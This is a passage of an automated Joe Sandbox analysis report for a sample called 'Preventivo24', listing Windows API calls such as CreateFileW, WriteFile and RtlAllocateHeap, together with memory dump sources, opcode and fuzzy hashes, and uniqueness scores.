                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: DeleteFile
                                                                              • String ID:
                                                                              • API String ID: 4033686569-0
                                                                              • Opcode ID: ee4897b94a262d6ecd95c46a864811d8cd32af3b0ee5c8e0532985a554d11458
                                                                              • Instruction ID: 173cf622988ca9e0bdfbc0fb2f9e3448dae1620052ba38c4eaa66bdef61993de
                                                                              • Opcode Fuzzy Hash: ee4897b94a262d6ecd95c46a864811d8cd32af3b0ee5c8e0532985a554d11458
                                                                              • Instruction Fuzzy Hash: 8B516A34A01A498FDB05CF68C948659FBE5FF49320F1482A9E925D73A1DB349E05CF91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • EnumResourceLanguagesW.KERNEL32(?,00000010,00000001,00FEB450,?), ref: 00FEB35B
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: EnumLanguagesResource
                                                                              • String ID:
                                                                              • API String ID: 4141015960-0
                                                                              • Opcode ID: e7eadb3f91bcb01e2cfb00d0a34c73e49638ade207868ea80af5574db8bec96c
                                                                              • Instruction ID: a066621e84acac94eedda95eee4642040503aaad40bde80e57b7a04592c73230
                                                                              • Opcode Fuzzy Hash: e7eadb3f91bcb01e2cfb00d0a34c73e49638ade207868ea80af5574db8bec96c
                                                                              • Instruction Fuzzy Hash: 7D41AE7180424A9BDB10DF95C981BDFBBF8FF04314F10416AE514BB282DB75A945CBA0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,B5580983,?,?,?,?,?,?,010E5C7D), ref: 0100A344
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: CreateFile
                                                                              • String ID:
                                                                              • API String ID: 823142352-0
                                                                              • Opcode ID: 1ae9fce5af4c002b01b8af17f8a9a59aa72d6829cad55b775d17ce3b7338de07
                                                                              • Instruction ID: 3d6f7d8e8ba3321843973efa01539e69667478a494ffd6bf5eee6867d997c3d7
                                                                              • Opcode Fuzzy Hash: 1ae9fce5af4c002b01b8af17f8a9a59aa72d6829cad55b775d17ce3b7338de07
                                                                              • Instruction Fuzzy Hash: 0D216F71A00309EFDB24DF69C945B9EBBF8FB48714F10466AE925A73C0DB746905CB90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • WriteFile.KERNEL32(00000000,?,00000000,B5580983,00000000,B5580983), ref: 01004546
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: FileWrite
                                                                              • String ID:
                                                                              • API String ID: 3934441357-0
                                                                              • Opcode ID: faa26174554aefce7436e010a3fef4661c38d54805b80870c84cc5914b249b3a
                                                                              • Instruction ID: d6222adb43a22b3c73db82134fe3a2e254628e72641bbc3a7078a53c5e02de23
                                                                              • Opcode Fuzzy Hash: faa26174554aefce7436e010a3fef4661c38d54805b80870c84cc5914b249b3a
                                                                              • Instruction Fuzzy Hash: 16F04431A04555AFDB21CF19DC45F9BB7BCEB45764F004225F921E73D4D7B4A9008694
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                                • Part of subcall function 0108C321: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,?,00000000,80004005,B5580983,?), ref: 0108C381
                                                                              • RtlAllocateHeap.NTDLL(?,00000000,?,B5580983,00000000,010B1B00,000000FF,?,?,011C5D3C,?,?,01003AC7,80004005,B5580983,?), ref: 00E8B0BA
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: AllocateExceptionHeapRaise
                                                                              • String ID:
                                                                              • API String ID: 3789339297-0
                                                                              • Opcode ID: cf174fa703301b24378897988d62f757e0d83041182e440c3d69fce49fc3baa4
                                                                              • Instruction ID: a5720f22e92a137ccdbedbd1aacee807a0523c767fedabdb8cbb6e33319d24c7
                                                                              • Opcode Fuzzy Hash: cf174fa703301b24378897988d62f757e0d83041182e440c3d69fce49fc3baa4
                                                                              • Instruction Fuzzy Hash: B0F0E271648208FFCB15DF40DD06F9ABBB8EB04B10F00862DF828826A0E735A9008B54
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • RtlAllocateHeap.NTDLL(00000000,00000000,010A060A,?,010A4853,?,00000000,?,0109464A,00000000,010A060A,?,?,?,?,010A0404), ref: 010A28D2
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: AllocateHeap
                                                                              • String ID:
                                                                              • API String ID: 1279760036-0
                                                                              • Opcode ID: 6db9e9081621eb71e8e607a759ec3c461105fd1fb89a5d4546ef46c8e367eb42
                                                                              • Instruction ID: 0835ef26280ed1bcc8d2b58eb5fe4cae86b215e858d4f9d4f835318af5c172bc
                                                                              • Opcode Fuzzy Hash: 6db9e9081621eb71e8e607a759ec3c461105fd1fb89a5d4546ef46c8e367eb42
                                                                              • Instruction Fuzzy Hash: F4E0653114722696F77126E95D04B9E7A8A9F426B0F8501B0FDD9A65C0DB54C88083F1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: H_prolog3
                                                                              • String ID:
                                                                              • API String ID: 431132790-0
                                                                              • Opcode ID: 4cf86d4ababd9dd035b5c3fc0479722b62d57a2e0519ed018bef3ca9144504fa
                                                                              • Instruction ID: 5dea4c0051fc6e5490474d5f1cf259ad22e7b6a6699d023fffd4c617ca41e2a6
                                                                              • Opcode Fuzzy Hash: 4cf86d4ababd9dd035b5c3fc0479722b62d57a2e0519ed018bef3ca9144504fa
                                                                              • Instruction Fuzzy Hash: 85E09A72C0020E9ADB01EFD4C551BEFB7B8FF18300F508026A645E7140EB7457458BE1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0108A39D
                                                                                • Part of subcall function 010879ED: DloadAcquireSectionWriteAccess.DELAYIMP ref: 010879F8
                                                                                • Part of subcall function 010879ED: DloadReleaseSectionWriteAccess.DELAYIMP ref: 01087A60
                                                                                • Part of subcall function 010879ED: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 01087A71
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                                              • String ID:
                                                                              • API String ID: 697777088-0
                                                                              • Opcode ID: 3f0db2ba9a48817f5fa34bf6b872e2bcee7967fbeeb442cdf8d1e4d51f7ea5af
                                                                              • Instruction ID: 6a432e34beea5a6ed4501a0bc4ed44cc6af7e33021f0028f96a989f0d90fa91e
                                                                              • Opcode Fuzzy Hash: 3f0db2ba9a48817f5fa34bf6b872e2bcee7967fbeeb442cdf8d1e4d51f7ea5af
                                                                              • Instruction Fuzzy Hash: B2B0929326C111AE200861115A06C3A210CD0A0910324800EF0C0A4000A5C10C494432
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0108A39D
                                                                                • Part of subcall function 010879ED: DloadAcquireSectionWriteAccess.DELAYIMP ref: 010879F8
                                                                                • Part of subcall function 010879ED: DloadReleaseSectionWriteAccess.DELAYIMP ref: 01087A60
                                                                                • Part of subcall function 010879ED: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 01087A71
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                                              • String ID:
                                                                              • API String ID: 697777088-0
                                                                              • Opcode ID: 71e473e404028207abab7870e7f0183aaced0c63ce5a57ea061a4d915f075a47
                                                                              • Instruction ID: 6c40428d11b79c1dff61e20c03232bb874584a75b80d4b5e40779e540f1b7cc7
                                                                              • Opcode Fuzzy Hash: 71e473e404028207abab7870e7f0183aaced0c63ce5a57ea061a4d915f075a47
                                                                              • Instruction Fuzzy Hash: 30B0129336C011BE300CB1155E02D3B310CD0F1D10330C00FF4C0D5500D5C00C484432
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 010B0937
                                                                                • Part of subcall function 010879ED: DloadAcquireSectionWriteAccess.DELAYIMP ref: 010879F8
                                                                                • Part of subcall function 010879ED: DloadReleaseSectionWriteAccess.DELAYIMP ref: 01087A60
                                                                                • Part of subcall function 010879ED: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 01087A71
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                                              • String ID:
                                                                              • API String ID: 697777088-0
                                                                              • Opcode ID: fa99ce3f3eb8469ec9344422731e65e8dcad8914d8e211672cc033ed1e413fe6
                                                                              • Instruction ID: 11481632bbde24bec568286c09e7475f4143b7a17dc490a82b0d64316af13137
                                                                              • Opcode Fuzzy Hash: fa99ce3f3eb8469ec9344422731e65e8dcad8914d8e211672cc033ed1e413fe6
                                                                              • Instruction Fuzzy Hash: A6B012D22AD001BD300CA2052E02E7B112CD4E4D74330801EF0C0C4108D7800C004431
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 01086EF1
                                                                                • Part of subcall function 010879ED: DloadAcquireSectionWriteAccess.DELAYIMP ref: 010879F8
                                                                                • Part of subcall function 010879ED: DloadReleaseSectionWriteAccess.DELAYIMP ref: 01087A60
                                                                                • Part of subcall function 010879ED: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 01087A71
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                                              • String ID:
                                                                              • API String ID: 697777088-0
                                                                              • Opcode ID: 0a4af8cc48680a64d549fd04a1fcd8ecd8c9fc2f756c2cac90efaf88ae61cf0a
                                                                              • Instruction ID: 41327dabc689f7d37433e31fdb5b65ef9c3f11222acdb196892825facae8eeec
                                                                              • Opcode Fuzzy Hash: 0a4af8cc48680a64d549fd04a1fcd8ecd8c9fc2f756c2cac90efaf88ae61cf0a
                                                                              • Instruction Fuzzy Hash: A6B0129235C101AD300CF1896E02D3B314CD0D0F10330802EF4D0D0140D5824C008171
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 01086EF1
                                                                                • Part of subcall function 010879ED: DloadAcquireSectionWriteAccess.DELAYIMP ref: 010879F8
                                                                                • Part of subcall function 010879ED: DloadReleaseSectionWriteAccess.DELAYIMP ref: 01087A60
                                                                                • Part of subcall function 010879ED: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 01087A71
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                                                                              • String ID:
                                                                              • API String ID: 697777088-0
                                                                              • Opcode ID: a556ef356e0f2db2d732ec678d6f6b3f7cc13c62d71b329127319b45d4a4e47f
                                                                              • Instruction ID: 97a25a0b4ac0928f07ab8eda6dd294a8834a4dc9bb3928040af382d97558edaa
                                                                              • Opcode Fuzzy Hash: a556ef356e0f2db2d732ec678d6f6b3f7cc13c62d71b329127319b45d4a4e47f
                                                                              • Instruction Fuzzy Hash: 3CB012D635C201BF300CB1839E02C3B310CC0D0E10330812EF0D0E0040D9828C414072
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 01086EF1
                                                                                • Part of subcall function 010879ED: DloadAcquireSectionWriteAccess.DELAYIMP ref: 010879F8
                                                                                • Part of subcall function 010879ED: DloadReleaseSectionWriteAccess.DELAYIMP ref: 01087A60
                                                                                • Part of subcall function 010879ED: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 01087A71
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
